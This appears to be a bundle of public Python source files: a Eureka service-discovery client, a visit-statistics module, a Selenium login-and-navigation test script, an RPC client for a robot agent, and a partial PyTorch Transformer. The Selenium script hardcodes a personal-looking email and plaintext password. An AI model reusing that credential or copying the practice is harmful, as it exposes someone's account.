EurekaUpdateFailedException(EurekaClientException):\n pass\n\n\nclass EurekaHeartbeatFailedException(EurekaClientException):\n pass\n\n\nclass EurekaGetFailedException(EurekaClientException):\n pass\n\n\nclass EurekaClient(object):\n \"\"\"\n Eureka Client\n \"\"\"\n EUREKA_SERVICE_URL = 'EUREKA_SERVICE_URL'\n EUREKA_INSTANCE_DATACENTER = 'EUREKA_INSTANCE_DATACENTER'\n EUREKA_HEARTBEAT_INTERVAL = 'EUREKA_HEARTBEAT_INTERVAL'\n EUREKA_SERVICE_PATH = 'EUREKA_SERVICE_PATH'\n EUREKA_INSTANCE_HOSTNAME = 'EUREKA_INSTANCE_HOSTNAME'\n EUREKA_INSTANCE_PORT = 'EUREKA_INSTANCE_PORT'\n EUREKA_INSTANCE_SECURE_PORT = 'EUREKA_INSTANCE_SECURE_PORT'\n\n def __init__(self,\n name,\n eureka_url=None,\n eureka_domain_name=None,\n host_name=None,\n data_center=None,\n instance_id=None,\n vip_address=None,\n secure_vip_address=None,\n port=None,\n secure_port=None,\n use_dns=True,\n region=None,\n prefer_same_zone=True,\n context=\"eureka/v2\",\n eureka_port=None,\n https_enabled=False,\n heartbeat_interval=None,\n service_path=None,\n pool_manager=None):\n\n self.app_name = name\n\n self.eureka_url = eureka_url or os.environ.get(EurekaClient.EUREKA_SERVICE_URL, None)\n self.data_center = data_center or os.environ.get(EurekaClient.EUREKA_INSTANCE_DATACENTER, None)\n self.heartbeat_interval = heartbeat_interval or int(os.environ.get(EurekaClient.EUREKA_HEARTBEAT_INTERVAL, 30))\n self.service_path = service_path or os.environ.get(EurekaClient.EUREKA_SERVICE_PATH, 'eureka/apps')\n self.host_name = host_name or os.environ.get(EurekaClient.EUREKA_INSTANCE_HOSTNAME, None)\n self.port = port or os.environ.get(EurekaClient.EUREKA_INSTANCE_PORT, None)\n self.secure_port = secure_port or os.environ.get(EurekaClient.EUREKA_INSTANCE_SECURE_PORT, None)\n self.use_dns = use_dns\n self.region = region\n self.prefer_same_zone = prefer_same_zone\n self.eureka_domain_name = eureka_domain_name\n self.eureka_port = eureka_port\n self.heartbeat_task = None\n self.instance_id = instance_id\n self.app_protocol = 'https://' if https_enabled else 'http://'\n\n host_info = HostInfo().get()\n\n if data_center == \"Amazon\":\n self.host_name = get_metadata(\"hostname\")\n elif not host_name:\n self.host_name = host_info['host']\n\n self.vip_address = vip_address\n if not self.vip_address:\n self.vip_address = host_info['IPv4']\n\n self.secure_vip_address = secure_vip_address\n if not self.secure_vip_address:\n self.secure_vip_address = host_info['IPv4']\n\n # Relative URL to eureka\n self.context = context\n self.eureka_urls = self.get_eureka_urls()\n self.requests = HttpClientObject(pool_manager=pool_manager)\n\n def _get_txt_records_from_dns(self, domain):\n records = dns.resolver.query(domain, 'TXT')\n for record in records:\n for string in record.strings:\n yield string\n\n def _get_zone_urls_from_dns(self, domain):\n for zone in self._get_txt_records_from_dns(domain):\n yield zone\n\n def get_zones_from_dns(self):\n return {\n zone_url.split(\".\")[0]:\n list(self._get_zone_urls_from_dns(\"txt.%s\" % zone_url))\n for zone_url in list(self._get_zone_urls_from_dns('txt.%s.%s' % (self.region, self.eureka_domain_name)))\n }\n\n def get_eureka_urls(self):\n \"\"\"\n Get Eureka URLs\n \"\"\"\n if self.eureka_url:\n return [self.eureka_url]\n elif self.use_dns:\n zone_dns_map = self.get_zones_from_dns()\n zones = zone_dns_map.keys()\n assert len(zones) > 0, \"No availability zones found for, please add them explicitly\"\n if self.prefer_same_zone:\n if self.get_instance_zone() in zones:\n zones = [zones.pop(\n zones.index(self.get_instance_zone()))] + zones # Add our zone as the first element\n else:\n logger.warn(\"No match for the zone %s in the list of available zones %s\" % (\n self.get_instance_zone(), zones)\n )\n service_urls = []\n for zone in zones:\n eureka_instances = zone_dns_map[zone]\n random.shuffle(eureka_instances) # Shuffle order for load balancing\n for eureka_instance in eureka_instances:\n server_uri = \"http://%s\" % eureka_instance\n if self.eureka_port:\n server_uri += \":%s\" % self.eureka_port\n eureka_instance_url = urljoin(server_uri, self.context, \"/\")\n if not eureka_instance_url.endswith(\"/\"):\n eureka_instance_url = \"%s/\" % eureka_instance_url\n service_urls.append(eureka_instance_url)\n primary_server = service_urls.pop(0)\n random.shuffle(service_urls)\n service_urls.insert(0, primary_server)\n logger.info(\"This client will talk to the following serviceUrls in order: %s\" % service_urls)\n return service_urls\n\n def get_instance_zone(self):\n \"\"\"\n Get Instance Zone\n \"\"\"\n if self.data_center == \"Amazon\":\n return get_metadata('availability-zone')\n else:\n raise NotImplementedError(\"%s does not implement DNS lookups\" % self.data_center)\n\n def get_instance_id(self):\n \"\"\"\n Get Instance ID\n \"\"\"\n if self.instance_id:\n return self.instance_id\n return self.host_name + ':' + self.app_name + ':' + str(self.port)\n\n def get_instance_data(self):\n \"\"\"\n Get Instance Data\n \"\"\"\n data_center_info = {\n 'name': self.data_center\n }\n if self.data_center == \"Amazon\":\n data_center_info['metadata'] = {\n 'ami-launch-index': get_metadata('ami-launch-index'),\n 'local-hostname': get_metadata('local-hostname'),\n 'availability-zone': get_metadata('availability-zone'),\n 'instance-id': get_metadata('instance-id'),\n 'public-ipv4': get_metadata('local-ipv4'),\n 'public-hostname': get_metadata('hostname'),\n 'ami-manifest-path': get_metadata('ami-manifest-path'),\n 'local-ipv4': get_metadata('local-ipv4'),\n 'ami-id': get_metadata('ami-id'),\n 'instance-type': get_metadata('instance-type'),\n }\n return {\n 'instance': {\n 'app': self.app_name,\n 'instanceId': self.get_instance_id(),\n 'hostName': self.host_name,\n 'ipAddr': self.vip_address,\n 'healthCheckUrl': self.app_protocol + self.host_name + ':' + str(self.port) + '/healthcheck',\n 'statusPageUrl': self.app_protocol + self.host_name + ':' + str(self.port) + '/healthcheck',\n 'homePageUrl': self.app_protocol + self.host_name + ':' + str(self.port) + '/healthcheck',\n 'port': {\n '$': self.port,\n '@enabled': 'true' if self.port is not None else 'false',\n },\n 'securePort': {\n '$': self.secure_port,\n '@enabled': 'true' if self.secure_port is not None else 'false',\n },\n 'vipAddress': self.vip_address,\n 'dataCenterInfo': {\n '@class': 'com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo',\n 'name': 'MyOwn',\n },\n },\n }\n\n def star(self):\n \"\"\"\n Start registration process\n :return:\n \"\"\"\n logger.info('Starting eureka registration')\n self.register()\n self.heartbeat_task = Thread(target=self._heartbeat)\n self.heartbeat_task.daemon = True\n self.heartbeat_task.start()\n\n def _heartbeat(self):\n while True:\n try:\n time.sleep(self.heartbeat_interval)\n self.renew()\n except Exception as ex:\n logger.debug(\"Exception during heartbeat: %s\" % eureka_url, str(ex))\n\n def register(self, initial_status=\"UP\"):\n \"\"\"\n Registers instance with Eureka, begins heartbeats, and fetches registry.\n :param initial_status: status string\n :return:\n \"\"\"\n instance_data = self.get_instance_data()\n instance_data['instance']['status'] = initial_status\n\n success = False\n for eureka_url in self.eureka_urls:\n url = urljoin(eureka_url, self.service_path + \"/%s\" % self.app_name)\n try:\n self.requests.POST(\n url=url, body=instance_data,\n headers={'Content-Type': 'application/json'})\n success = True\n except ApiException as ex:\n logger.debug(\"ApiException while trying to register at '%s' error: %s\" % (url, str(ex)))\n success = False\n if not success:\n raise EurekaRegistrationFailedException(\"Did not receive correct reply from any instances\")\n\n def renew(self):\n \"\"\"\n Send application instance heartbeat\n \"\"\"\n logger.info(' Updating registeration status ')\n success = False\n for eureka_url in self.eureka_urls:\n url = urljoin(eureka_url, self.service_path + '/%s/%s' % (\n self.app_name,\n self.get_instance_id()\n ))\n try:\n self.requests.PUT(url=url)\n success = True\n except ApiException as ex:\n logger.debug(\"ApiException while trying to renew at '%s' error: %s\" % (url, str(ex)))\n if ex.status == 404:\n self.register()\n return\n else:\n success = False\n if not success:\n raise EurekaUpdateFailedException(\"Did not receive correct reply from any instances\")\n\n # a generic get request, since most of the get requests for discovery will take a similar form\n def _get_from_any_instance(self, endpoint):\n for eureka_url in self.eureka_urls:\n try:\n r = self.requests.GET(urljoin(eureka_url, endpoint), headers={'accept': 'application/json'})\n r.raise_for_status()\n return json.loads(r.content)\n except:\n pass\n raise EurekaGetFailedException(\"Failed to GET %s from all instances\" % endpoint)\n\n def get_apps(self):\n return self._get_from_any_instance(\"apps\")\n\n def get_app(self, app_id):\n return self._get_from_any_instance(\"apps/%s\" % app_id)\n\n def get_vip(self, vip_address):\n return self._get_from_any_instance(\"vips/%s\" % vip_address)\n\n def get_svip(self, vip_address):\n return self._get_from_any_instance(\"svips/%s\" % vip_address)\n\n def get_instance(self, instance_id):\n return self._get_from_any_instance(\"instances/%s\" % instance_id)\n\n def get_app_instance(self, app_id, instance_id):\n return self._get_from_any_instance(\"apps/%s/%s\" % (app_id, instance_id))\n","repo_name":"elviejokike/flask-eureka","sub_path":"flask_eureka/eurekaclient.py","file_name":"eurekaclient.py","file_ext":"py","file_size_in_byte":12210,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"37"} +{"seq_id":"1150704972","text":"from datetime import datetime, timedelta\nfrom src.json_utils import *\nfrom src.responds import *\nfrom src.user_utils import *\nfrom src.errors import *\nfrom src.file_utils import *\nfrom src.night_mode import *\n\nPROJECT_DIR = Path(__file__).parent.parent.resolve()\nVISIR_COUNTERS = PROJECT_DIR / \"visit_counters.json\"\n\n\ndef increment_page_visit(self, endpoint: str) -> None:\n today = str(datetime.today().date())\n statistics_content = read_json_file(VISIR_COUNTERS)\n\n if endpoint not in statistics_content:\n statistics_content[endpoint] = {}\n if today not in statistics_content[endpoint]:\n statistics_content[endpoint][today] = 0\n\n statistics_content[endpoint][today] += 1\n write_json_file(VISIR_COUNTERS, statistics_content)\n\n\ndef calculate_stats(page_statistics, start_date, count_days) -> int:\n visit_counter = 0\n for day_counter in range(0, count_days + 1):\n day = str(start_date - timedelta(days=day_counter))\n if day in page_statistics:\n visit_counter += page_statistics[day]\n\n return visit_counter\n\n\ndef get_page_statistics(self, method: str, endpoint: str, _qs) -> None:\n switcher = {\n \"GET\": show_page_statistics,\n \"POST\": save_page_statistics,\n }\n if method in switcher:\n switcher[method](self, endpoint, \"/statistics\")\n else:\n raise MethodNotAllowed\n\n\ndef show_page_statistics(self, _method, _endpoint) -> None:\n statistics_content = read_json_file(VISIR_COUNTERS)\n\n today = datetime.today().date()\n stats = {}\n for page in statistics_content:\n stats[page] = {}\n stats[page][\"today\"] = calculate_stats(statistics_content[page], today, 0)\n stats[page][\"yesterday\"] = calculate_stats(statistics_content[page], today - timedelta(days=1), 0)\n stats[page][\"week\"] = calculate_stats(statistics_content[page], today, 7)\n stats[page][\"month\"] = calculate_stats(statistics_content[page], today, 30)\n\n html = \"\"\"
    \n \n \n \n \n \n \"\"\"\n for endpoint, visits in stats.items():\n html += f\"\"\n for data, count in visits.items():\n html += f\"\"\n html += \"\"\n\n user_id = get_user_id(self)\n user_session = read_user_session(self, user_id)\n\n msg = get_file_contents(\"pages/statistics.html\").format(stats=html, **user_session[user_id])\n respond_200(self, msg, \"text/html\")\n\n\ndef save_page_statistics(self, endpoint: str, redirect_to: str):\n switcher = {\n \"/statistics/set_night_mode\": set_night_mode,\n }\n if endpoint in switcher:\n switcher[endpoint](self, redirect_to)\n else:\n raise MethodNotAllowed","repo_name":"jajabin/teachmeskills","sub_path":"src/statistics_page.py","file_name":"statistics_page.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25658377519","text":"import datetime\nfrom time import sleep\nfrom selenium import webdriver\nimport wegostudy_locator as locators\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.service import Service\ns = Service(executable_path='./chromedriver.exe')\ndriver = webdriver.Chrome(service=s)\n\ndef setUp():\n # print test start day and time\n print(f'Test started at: {datetime.datetime.now()}')\n\n # Make a full screen\n driver.maximize_window()\n\n # Let's wait for the browser respond in general\n driver.implicitly_wait(30)\n\n # navigating to Moodle app website\n driver.get(locators.wegostudy_url)\n\n # Checking that we're on the correct URL address and we're seeing correct title\n if driver.current_url == locators.wegostudy_url and driver.title == \"WeGoStudy\":\n print(f'we are at we go study homepage --{driver.current_url}')\n print(f'we\\'re seeing title message --{driver.title} ')\n sleep(1)\n\n else:\n print(f'we\\'re not at the we go study homepage, Check your code!')\n driver.close()\n driver.quit()\n\n\ndef tearDown():\n if driver is not None:\n print(f'------------------------------------')\n print(f'Test Completed at: {datetime.datetime.now()}')\n driver.close()\n driver.quit()\n\ndef browse_institution():\n driver.find_element(By.LINK_TEXT, 'BROWSE INSTITUTIONS').click()\n sleep(0.5)\n if driver.current_url == locators.browse_institution_url:\n driver.find_element(By.XPATH, \"//h2[contains(text(),'Search The Largest Database of Institutions In Can')]\").is_displayed()\n sleep(0.5)\n print(f'we are on browse institution page------{driver.current_url}')\n\n driver.find_element(By.XPATH, \"//input[@id='search_field']\").click()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//input[@id='search_field']\").send_keys('Niagara College')\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//button[@id='search_institute_form']\").click()\n sleep(0.5)\n\ndef sign_in():\n driver.find_element(By.XPATH, \"//b[normalize-space()='LOGIN']\").click()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//input[@id='user_email']\").send_keys('chris.velasco78@gmail.com')\n sleep(0.5)\n\n driver.find_element(By.XPATH,\"//input[@id='user_password']\").send_keys('123cctb')\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//input[@name='commit']\").click()\n sleep(1)\n\n # driver.find_element(By.XPATH, \"//div[@id='authentication']\").click()\n # sleep(0.5)\n\n if driver. current_url == locators.partner_home_url:\n driver.find_element(By.XPATH, \"//span[contains(.,'Ch Velasco')]\").is_displayed()\n sleep(0.5)\n print(f'Test scenario: login with new credential : username - chris.velasco78@gmail.com, password - 123cctb')\n\n else:\n print(\"Check your code!\")\n\n\ndef my_wegostudy_applications():\n if driver.current_url == locators.partner_home_url:\n driver.find_element(By.XPATH, \"//span[contains(.,'My WeGoStudy')]\").click()\n sleep(0.5)\n driver.find_element(By.XPATH, \"//a[contains(.,'Applications')]\").click()\n sleep(0.5)\n\n # All Application\n if driver.current_url == locators.mywegostudy_application_url:\n driver.find_element(By.XPATH, \"//h4[contains(.,'Admission Applications')]\").is_displayed()\n sleep(0.5)\n print(f'we are at Application home page -- {driver.current_url}')\n\n else:\n print(' we are not landing at application page, check your code')\n\n driver.find_element(By.XPATH, \"//a[contains(.,'All Applications')]\").click()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//a[contains(.,'AS000071-35')]\").is_displayed()\n sleep(0.5)\n\n # navigate to Edit admission application by application number.\n driver.find_element(By.XPATH, \"//a[contains(.,'AS000071-35')]\").click()\n sleep(2)\n\n # switch to new tab\n driver.switch_to.window(driver.window_handles[1])\n sleep(0.5)\n\n if driver. current_url == locators.edit_reza_admission_url:\n assert driver.find_element(By.XPATH, \"//h4[contains(.,'Edit admission application for Reza')]\").is_displayed()\n print(f' we are at Edit admission application for Reza page.')\n\n else:\n print('check your code!')\n driver.close()\n\n # switch to original tab\n driver.switch_to.window(driver.window_handles[0])\n\n # Id Number\n driver.find_element(By.XPATH, \"//a[contains(.,'S000071')]\").is_displayed()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//a[contains(.,'S000071')]\").click()\n sleep(0.5)\n\n # switch to new tab\n driver.switch_to.window(driver.window_handles[1])\n sleep(0.5)\n\n if driver.current_url == locators.reza_detail_url:\n driver.find_element(By.XPATH, \"//a[contains(.,'Personal Details:')]\").is_displayed()\n driver.find_element(By.XPATH, \"//a[contains(.,'Reza')]\").is_displayed()\n print(f' we are at student details page.')\n\n else:\n print('check your code')\n driver.close()\n\n # switch to original tab\n driver.switch_to.window(driver.window_handles[0])\n\n #First name, Lastname\n driver.find_element(By.XPATH, \"//a[contains(.,'Reza')]\").is_displayed()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//a[contains(.,'sada')]\").is_displayed()\n sleep(0.5)\n\n # school\n driver.find_element(By.XPATH, \"//a[contains(.,'Algonquin College')]\").is_displayed()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//a[contains(.,'Algonquin College')]\").click()\n sleep(0.5)\n\n # switch to new tab\n driver.switch_to.window(driver.window_handles[1])\n sleep(0.5)\n if driver.current_url == locators.algonquin_college_url:\n print('we are at ALGONQUIN COLLEGE home page ')\n driver.close()\n\n # switch to original tab\n driver.switch_to.window(driver.window_handles[0])\n sleep(0.5)\n\n #Programs\n driver.find_element(By.XPATH, \"//a[contains(.,'Forestry Technician')]\").is_displayed()\n sleep(0.5)\n driver.find_element(By.XPATH, \"//a[contains(.,'Forestry Technician')]\").click()\n sleep(0.5)\n\n # switch to new tab\n driver.switch_to.window(driver.window_handles[1])\n sleep(0.5)\n\n if driver.current_url == locators.forestry_technician_url:\n driver.find_element(By.XPATH, \"//h4[contains(.,'Forestry Technician')]\").is_displayed()\n print('we are at Forestry Technician page.')\n driver.close()\n\n # switch to original tab\n driver.switch_to.window(driver.window_handles[0])\n sleep(0.5)\n\n # status\n driver.find_element(By.XPATH, \"//span[@class='badge badge-incomplete status-badge']\").is_displayed()\n sleep(0.5)\n\n # status date\n driver.find_element(By.XPATH, \"//td[contains(.,'April 21, 2022')]\").is_displayed()\n sleep(0.5)\n\n # check select\n driver.find_element(By.XPATH, \"//label[@for='application_ids_84']\").click()\n sleep(0.5)\n\n # Chat\n driver.find_element(By.XPATH, \"//i[@class='fa fa-comments-o']\").click()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//input[@id='admin_message_content']\").click()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//input[@id='admin_message_content']\").send_keys(locators.subject)\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//i[@class='fa fa-paper-plane']]\").click()\n sleep(0.5)\n\n driver.find_element(By.XPATH, \"//i[@class='fa fa-comments-o']\").click()\n sleep(0.5)\n print('successfully sent message!')\n\n driver.find_element(By.XPATH, \"///button[@class='btn btn-default btn-sm']\").click()\n sleep(0.5)\n\n\n\n\n\n\n\n\n\n\n # driver.find_element(By.XPATH, \"//button[@id='pay_for_application']\").click()\n # sleep(0.5)\n # if driver.current_url == locators.pay_application_url:\n # driver.find_element(By.XPATH,\"//h4[contains(.,'Pay Application fee $ 95')]\").is_displayed()\n #\n #\n # # Incompleted Applications\n # driver.find_element(By.XPATH, \"//a[contains(.,'Incomplete Applications')]\").click()\n # if driver.current_url == locators.mywegostudy_incomplete_application_url:\n #\n # # Summited Applications\n # driver.find_element(By.XPATH,\"//a[contains(.,'Submitted Applications')]\"). click()\n # if driver.current_url == locators.mywegostudy_submitted_application_url:\n #\n # # Approved Application\n # driver.find_element(By.XPATH,\"//a[contains(.,'Approved Applications')]\").click()\n # if driver.current_url == locators.mywegostudy_approved_application_url:\n #\n #\n # # Accepted Applications\n # driver.find_element(By.XPATH, \"//a[contains(.,'Accepted Applications')]\").click()\n # if driver.current_url == locators.mywegostudy_accepted_application_url:\n\n\n\n\n\nsetUp()\n# browse_institution()\nsign_in()\nmy_wegostudy_applications()\n# tearDown()\n","repo_name":"EileenHwang-QA/Wegostudyapp","sub_path":"wegostudy_methods.py","file_name":"wegostudy_methods.py","file_ext":"py","file_size_in_byte":9256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23797960133","text":"from typing import Optional\nimport pickle\n\nfrom beartype import beartype\nimport torch\n\nfrom edf_interface.pyro import get_service_proxy\nfrom edf_interface.data import SE3, PointCloud, TargetPoseDemo, DemoSequence\n\n@beartype\nclass EdfClient():\n def __init__(self, env_server_name: str = 'env',\n agent_sever_name: str = 'agent'):\n self.env_service = get_service_proxy(env_server_name)\n self.agent_service = get_service_proxy(agent_sever_name)\n\n def get_current_poses(self, **kwargs) -> SE3:\n data_dict = self.env_service.get_current_poses(**kwargs)\n return SE3.from_data_dict(data_dict=data_dict)\n \n def observe_scene(self, **kwargs) -> PointCloud:\n data_dict = self.env_service.observe_scene(**kwargs)\n return PointCloud.from_data_dict(data_dict=data_dict)\n \n def observe_grasp(self, **kwargs) -> PointCloud:\n data_dict = self.env_service.observe_grasp(**kwargs)\n return PointCloud.from_data_dict(data_dict=data_dict)\n \n def move_se3(self, target_poses: SE3, **kwargs) -> bool:\n target_poses = target_poses.get_data_dict(serialize=True)\n success = self.env_service.move_se3(target_poses=target_poses, **kwargs)\n return success\n \n def infer_target_poses(self, scene_pcd: PointCloud, \n task_name: str,\n grasp_pcd: Optional[PointCloud] = None,\n current_poses: Optional[SE3] = None, \n **kwargs) -> SE3:\n scene_pcd = scene_pcd.get_data_dict(serialize=True)\n if grasp_pcd is not None:\n grasp_pcd = grasp_pcd.get_data_dict(serialize=True)\n else:\n grasp_pcd = {}\n if current_poses is not None:\n current_poses = current_poses.get_data_dict(serialize=True)\n else:\n current_poses = {}\n target_poses_dict = self.agent_service.infer_target_poses(scene_pcd=scene_pcd, grasp_pcd=grasp_pcd, task_name=task_name, current_poses=current_poses, **kwargs)\n return SE3.from_data_dict(target_poses_dict)\n","repo_name":"tomato1mule/edf_interface","sub_path":"dev_log/edf_client.py","file_name":"edf_client.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26445251001","text":"import math\nimport torch\nimport torch.nn as nn\n# torch 中变量封装函数\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom copy import deepcopy as c\n\nclass Embedding(nn.Module):\n def __init__(self, d_model, d_vocab):\n super().__init__()\n self.d_model = d_model\n self.emb = nn.Embedding(d_vocab, d_model)\n \n def forward(self, x):\n # 其中 math.sqrt(self.d_model) 为缩放因子 \n return self.emb(x) * math.sqrt(self.d_model)\n\nclass PositionEmbedding(nn.Module):\n def __init__(self, d_model=512, p_dropout=0.1, max_len=5000):\n super().__init__()\n # 对输入进行随即丢弃\n self.dropout = nn.Dropout(p=p_dropout)\n \n # 先初始化一个全为 0 的位置编码\n pe = torch.zeros((max_len, d_model))\n position = torch.arange(0, max_len).unsqueeze(1) # => (max_len, 1)\n # 进行正弦和余弦的位置编码\n # pe(pos, 2i) = sin(pos/10000^(2i/d_model)) = sin(pos * e^(2i * -log(10000.0)/ d_model ))\n # pe(pos, 2i + 1) = cos(pos/10000^(2i/d_model)) = cos(pos * e^(2i * -log(10000.0) / d_model ))\n # 怎么理解 pos 和 i, ==》 pos 代表第输入中单词在pos位置, 而 i 代表词向量中的位置\n # torch.arange(0, d_model, 2) 对应 2i\n div_term = torch.exp(torch.arange(0, d_model, 2) * -(math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n \n # 此时 pe = (max_len, d_model),因为我们的输入为三维,带有 batch_size\n pe = pe.unsqueeze(0)\n \n # 最后将 pe 注册为模型的 buffer,什么是 buffer 呢?\n # 我们把它认为是对模型有帮助的,但是却不是模型中的超参数,不需要随着优化步骤进行更新增益对象\n # 注册之后,我们就可以在模型保存后重加载时和模型结构参数一同被记载,\n # 可以被认为是绑定到我们的模型的一些不优化的参数 -> state_dict() 中\n # 解释 : https://blog.csdn.net/weixin_46197934/article/details/119518497\n self.register_buffer('pe', pe)\n def forward(self, x):\n # 将当前输入的[batch, word_len, d_model] + pe\n # 为什么 :x.size(1),因为我们提前算好 max_len,方便一点\n x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)\n return self.dropout(x)\n \ndef subsequent_mask(size=512):\n \"\"\"\n 生成向后的掩盖的掩码张量, 参数 size 是掩码张量的最后两个维度的大小,\n 它的最后两维形成一个方阵\n 1 0 0 0\n 1 1 0 0\n 1 1 1 0\n 1 1 1 1\n 可以理解为前面的输入没必要和后面还没有输入的地方做注意力机制,\n \"\"\"\n # 先形成全1矩阵,再变换为上三角矩阵,最后1减去就变成了下三角矩阵了\n subsequent_mask = np.triu(np.ones((1, size, size)), k = 1).astype(np.int8)\n return torch.from_numpy(1 - subsequent_mask)\n\ndef attention(query, key, value, mask=None, dropout=None):\n \"\"\"\n 计算公式为: ans = softmax(Q * K_T / sqrt(d_k)) * V\n \"\"\"\n # 计算注意力机制的分数\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)\n\n # 是否存在掩码张量\n if mask is not None:\n # 将 mask 为 0 的地方设置为 -1e9\n scores = scores.masked_fill(mask == 0, -1e9)\n\n # 计算 softmax\n p_attn = F.softmax(scores, dim=-1)\n \n # 是否存在 dropout\n if dropout is not None:\n p_attn = dropout(p_attn)\n \n # 返回注意力机制的值和注意力机制的分数, 并返回注意力机制的值\n return torch.matmul(p_attn, value), p_attn\n\ndef clone_modules(module, N):\n \"\"\"\n 克隆 N 个 module\n \"\"\"\n return nn.ModuleList([c(module) for _ in range(N)])\n\nclass MultiHeadedAttention(nn.Module):\n \"\"\"\n 实现多头注意力机制\n \"\"\"\n def __init__(self, head=8, embedding_dim=512, p_dropout=0.1):\n super().__init__()\n # 确定多头的head需要整除词嵌入的维度\n assert embedding_dim % head == 0\n \n # 确认每个头的词嵌入的维度\n self.d_k = embedding_dim // head\n self.head = head\n self.embedding_dim = embedding_dim\n \n # 获得线性层, 需要获得4个,分别是 Q、K、V 和最后的输出\n self.linears = clone_modules(nn.Linear(embedding_dim, embedding_dim), 4)\n \n # 初始化注意力张量\n self.attn = None\n \n # 初始化 dropout 对象\n self.dropout = nn.Dropout(p=p_dropout)\n \n def forward(self, query, key, value, mask=None):\n # 是否存在 mask \n if mask is not None:\n # 因为是多头注意力机制,所以这里需要将 mask 扩展维度\n mask = mask.unsqueeze(0)\n \n # 接着,我们获得一个batch_size的变量, 代表有多少条样本\n batch_size = query.size(0)\n \n # view 是为了让 Q、K、V变成多头注意力的形式, 但是这样的形式,是没有办法输入到attention 中\n # 进行并行处理的, 如果把 head 和 词数量 的位置变化一下,就是每个头单独进行注意力计算\n query, key, value = \\\n [model(x).view(batch_size, -1, self.head, self.d_k).transpose(1, 2)\n for model, x in zip(self.linears, (query, key, value))]\n \n # 将多个头的输出送入到 attention 中一起并行计算注意力即可\n x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout)\n \n # 得到多头注意力的结果之后,我们还需要转化一下维度,拼凑为原始的 d_model 的注意力机制\n x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.embedding_dim)\n \n # 最后输出的时候,再经过一个线性变换层即可\n return self.linears[-1](x)\n \nclass PositionwiseFeedForward(nn.Module):\n \"\"\"\n 前馈全连接层\n return linear(dropout(relu(linear(x))))\n \"\"\"\n def __init__(self, d_model, d_ff, p_dropout=0.1):\n super().__init__()\n self.f1 = nn.Linear(d_model, d_ff)\n self.f2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(p=p_dropout)\n \n def forward(self, x):\n return self.f2(self.dropout(F.relu(self.f1(x))))\n \nclass LayerNorm(nn.Module):\n \"\"\"\n 对单个batch、单个样本中的最后特征维度进行归一化操作,\n 解决NLP中 BN 中输入样本长度不一致的问题\n \"\"\"\n def __init__(self, features_size, eps=1e-6):\n super().__init__()\n self.train_mean = nn.Parameter(torch.ones(features_size))\n self.train_std = nn.Parameter(torch.zeros(features_size))\n self.eps = eps\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return (x - mean) / (std + self.eps) * self.train_mean + self.train_std\n \nclass SublayerConnection(nn.Module):\n \"\"\"\n 对照着模型进行残差连接\n \"\"\"\n def __init__(self, size, p_dropout=0.1):\n super().__init__()\n self.norm = LayerNorm(size)\n self.dropout = nn.Dropout(p=p_dropout)\n \n def forward(self, x, sublayer):\n # 在论文复现的时候发现 self.norm 放在 里面 比放在 外面 好\n return x + self.dropout(sublayer(self.norm(x)))\n \nclass EncoderLayer(nn.Module):\n def __init__(self, d_model, attn_layer, feed_forward_layer, dropout):\n super().__init__()\n self.d_model = d_model\n self.attn = attn_layer\n self.feed_forward = feed_forward_layer\n \n # 还需要初始化两个残差连接\n self.subLayers = clone_modules(SublayerConnection(d_model, dropout), 2)\n \n def forward(self, x, mask):\n # 经过多头注意力层,然后残差,然后前馈层,然后再残差\n x = self.subLayers[0](x, lambda x : self.attn(x, x, x, mask))\n return self.subLayers[1](x, self.feed_forward)\n \nclass Encoder(nn.Module):\n def __init__(self, layer, N):\n super().__init__()\n self.norm = LayerNorm(layer.d_model)\n self.layers = clone_modules(layer, N)\n \n def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)\n\nclass DecoderLayer(nn.Module):\n def __init__(self, d_model, self_attn, src_attn, feed_forward, p_dropout) -> None:\n super().__init__()\n # self_attn 为自注意力机制 src_attn 为原始的多头注意力机制\n self.d_model = d_model\n self.self_attn = self_attn\n self.src_attn = src_attn\n self.ff = feed_forward\n self.subLayers = clone_modules(SublayerConnection(d_model, p_dropout), 3)\n \n def forward(self, x, m, src_mask, tgt_mask):\n \"\"\"\n x: 上一层的输入, m(memory): 来自编码器的输出, src_mask: 原数据掩码,tgt_mask: 目标数据掩码\n \"\"\"\n # 第一步,是解码器的输入自己和自己作注意力机制,这个时候哦,我们不希望前面已经输出的和后面的词作注意力机制\n # 因为解码器端口的输入是我们一次给完整的,方便我们计算损失和并行化\n x = self.subLayers[0](x, lambda x : self.self_attn(x, x, x, tgt_mask))\n # 第二步:是解码器输入得到的注意力结果之后,和我们编码器的最终的输出进行注意力的操作,\n # 这里的 src_mask 